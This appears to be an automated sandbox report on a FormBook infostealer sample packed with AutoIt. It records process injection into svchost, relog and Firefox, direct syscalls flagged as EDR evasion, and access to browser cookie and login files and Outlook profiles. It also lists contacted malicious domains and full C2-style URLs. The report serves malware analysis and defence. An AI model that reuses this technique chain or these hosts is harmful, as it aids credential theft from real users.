                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03642840 mov ecx, dword ptr fs:[00000030h]1_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660854 mov eax, dword ptr fs:[00000030h]1_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov ecx, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005F0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_005F0B62
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005C2622
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005B083F
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B09D5 SetUnhandledExceptionFilter,0_2_005B09D5
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005B0C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: NULL target: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: NULL target: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\relog.exeThread register set: target process: 7808Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\relog.exeThread APC queued: target process: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2BE6008Jump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005F1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_005F1201
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005D2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_005D2BA5
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005FB226 SendInput,keybd_event,0_2_005FB226
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_006122DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_006122DA
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BDlwy8b7Km.exe"Jump to behavior
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exeProcess created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\relog.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005F0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_005F0B62
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005F1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_005F1663
                Source: BDlwy8b7Km.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: BDlwy8b7Km.exe, FKUPIibLrFYhJ.exe, 00000005.00000002.3559997147.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000000.1964352966.0000000000D81000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560168658.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: FKUPIibLrFYhJ.exe, 00000005.00000002.3559997147.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000000.1964352966.0000000000D81000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560168658.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: FKUPIibLrFYhJ.exe, 00000005.00000002.3559997147.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000000.1964352966.0000000000D81000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560168658.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: FKUPIibLrFYhJ.exe, 00000005.00000002.3559997147.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000000.1964352966.0000000000D81000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560168658.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005B0698 cpuid 0_2_005B0698
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_00608195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00608195
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005ED27A GetUserNameW,0_2_005ED27A
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005CBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_005CBB6F
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005942DE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2044978027.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3560373501.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\relog.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\relog.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: BDlwy8b7Km.exeBinary or memory string: WIN_81
                Source: BDlwy8b7Km.exeBinary or memory string: WIN_XP
                Source: BDlwy8b7Km.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: BDlwy8b7Km.exeBinary or memory string: WIN_XPe
                Source: BDlwy8b7Km.exeBinary or memory string: WIN_VISTA
                Source: BDlwy8b7Km.exeBinary or memory string: WIN_7
                Source: BDlwy8b7Km.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2044978027.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3560373501.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_00611204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00611204
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_00611806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00611806

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets241
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials12
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588891 Sample: BDlwy8b7Km.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 28 www.thinkone.xyz 2->28 30 www.givvjn.info 2->30 32 5 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 BDlwy8b7Km.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 FKUPIibLrFYhJ.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 relog.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 FKUPIibLrFYhJ.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.givvjn.info 47.83.1.90, 49736, 49789, 49805 VODANETInternationalIP-BackboneofVodafoneDE United States 22->34 36 www.gern.dev 185.151.30.223, 49882, 49899, 49915 TWENTYIGB United Kingdom 22->36 38 3 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                BDlwy8b7Km.exe71%ReversingLabsWin32.Trojan.AutoItinject
                BDlwy8b7Km.exe100%AviraHEUR/AGEN.1319493
                BDlwy8b7Km.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.givvjn.info/wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQUF+eqUdc9aZVsWrUptbZMNnY=&TXVlY=nv6XU20pgPTDN00%Avira URL Cloudsafe
                http://www.mraber.dev0%Avira URL Cloudsafe
                http://www.thinkone.xyz/b0aw/?TXVlY=nv6XU20pgPTDN0&94=VOu4tm+43rVZiGe5FbAiEYOvTb19T2jZsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLd6K3CAsSqZssuvcDLtxMQvu7+dmYX9caOt4=0%Avira URL Cloudsafe
                http://www.mraber.dev/ixqi/?94=TN9kbi/KmEXimVSL0ERanCo8EPrJiw0+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyN0TYvIjkiLeGXDgVU6Nef5fP7k6kFQJQYe0=&TXVlY=nv6XU20pgPTDN00%Avira URL Cloudsafe
                http://www.mraber.dev/ixqi/0%Avira URL Cloudsafe
                http://www.newbh.pro/fpja/0%Avira URL Cloudsafe
                http://www.givvjn.info/wl3x/0%Avira URL Cloudsafe
